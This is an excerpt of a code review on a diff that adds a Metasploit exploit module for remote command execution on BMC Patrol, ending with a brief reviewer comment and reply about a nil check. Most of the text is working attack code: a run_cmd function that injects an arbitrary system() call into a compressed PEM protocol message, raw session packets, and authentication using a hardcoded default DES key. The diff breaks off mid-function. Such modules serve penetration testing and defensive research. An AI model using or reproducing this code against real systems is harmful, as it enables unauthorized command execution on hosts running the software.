modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1201 @@
+  def receive_msg()
+
+    header = sock.get_once(6)
+    if header == $nil
+      return
+    end
+
+    payload_size_arr = header[0,4]
+    payload_size = payload_size_arr.unpack("N")[0]
+    payload = ''
+    if payload_size > 0
+      payload = sock.get_once(payload_size)
+      if payload == $nil
+        return
+      end
+    end
+
+    return header + payload
+
+  end
+
+  def send_msg(type, compression, data)
+
+    ret_len = 0
+    data_len = data.length
+    buf = [data_len].pack('N')
+
+    #Set the type
+    buf += [type].pack('C')
+
+    #Set compression flag
+    buf += [compression].pack('C')
+
+    #Add data
+    buf += data
+
+    #Send msg
+    sock.put(buf)
+
+  end
+
+  def process_response( ret_data )
+
+    ret_len = ret_data.length
+    #print_status( "Response Length: #{ret_len}" )
+
+    ret_size_arr = ret_data[0,4]
+    ret_size = ret_size_arr.unpack("N")[0]
+    #print_status( "Response Payload Length: #{ret_size}" )
+
+    msg_type = ret_data[4,1]
+    #print_status( "Response Msg Type: #{msg_type}" )
+
+    comp_flag = ret_data[5,1]
+    #print_status( "Compression Flag: #{comp_flag}" )
+
+    payload_data = $nil
+    if comp_flag == "\x00"
+      payload_data = ret_data[6..-1]
+      bin_data = payload_data.unpack("H*")[0]
+      #print_status( "Hex: #{bin_data}" )
+      payload_data = $inflater.inflate(payload_data)
+
+    end
+
+    #print_status( "Response: #{payload_data}" )
+    return payload_data
+
+  end
+
+  def run_cmd(cmd)
+
+    user_num = rand 1000..9999
+    msg_1 = %Q(R_E
+{
+\tRE_ID=1
+\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num}
+\tRE_ORG=PemApi
+\tRE_SEV=1
+\tRE_NSEV=5
+\tRE_ST=
+}
+)
+
+    msg_1 += "\x00"
+    #print_status( "Msg: #{msg_1}" )
+    #bin_data = msg_1.unpack("H*")[0]
+    #print_status( "Hex: #{bin_data}" )
+    comp_data = $deflater.deflate msg_1, Zlib::SYNC_FLUSH
+    send_msg( 0x44, 0x0, comp_data )
+
+  end
+
+  def identify( user )
+
+    inner_len = 15
+    msg_type = 8
+    len_str = [inner_len].pack("N")
+    msg_str = [msg_type].pack("N")
+    msg_1 = %Q(PEM_MSG
+{
+\tNSDL=#{inner_len.to_s}
+\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00
+}
+)
+    msg_1 += "\x00"
+    print_status( "Msg: #{msg_1}" )
+    bin_data = msg_1.unpack("H*")[0]
+    #print_status( "Hex: #{bin_data}" )
+
+    comp_data = $deflater.deflate msg_1, Zlib::SYNC_FLUSH
+    send_msg( 0x44, 0x0, comp_data )
+    #ret_data = receive_msg()
+
+   #print the response
+    #process_response( ret_data )
+
+  end
+
+  def create_session()
+    sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00"
+    sess_msg += "\x00" * 0x68
+    send_msg( 0x45, 0x2, sess_msg )
+  end
+
+  def authenticate_user( user, password )
+    #Default encryption key
+    enc_key = 'k$C4}@"_'
+    output_data = des_crypt_func( password, enc_key, $DES_ENCRYPT)
+    #Convert to hex string
+    encrpted_pw = output_data.unpack("H*")[0]
```

Comment:
Your `des_crypt_func` could return nil, so you actually need to check for that return value before using it. Otherwise, this is technically a bug.

Reply:
Since the function is only being used for encryption and the nil case is from DECRYPT, I removed the code to make it clearer.